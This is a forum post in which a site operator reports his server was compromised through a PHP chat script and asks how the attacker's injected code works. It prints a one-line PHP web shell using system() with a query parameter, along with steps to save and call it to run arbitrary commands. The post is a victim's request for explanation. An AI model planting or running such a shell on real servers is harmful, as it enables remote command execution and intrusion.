Posted by Oski on 12/16/70 11:57

Hello,

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
I couldn't find anything about this on the web (didn't know how to
specify the search to get useful results). Can anybody explain what
happens?

Thanks and best regards,
Ingo

• Next in forum: Re: Hacked with system()
• Prev in forum: Re: How to upload form data containing special characters correctly?
• Thread view: Hacked with system()

[Reply to this message]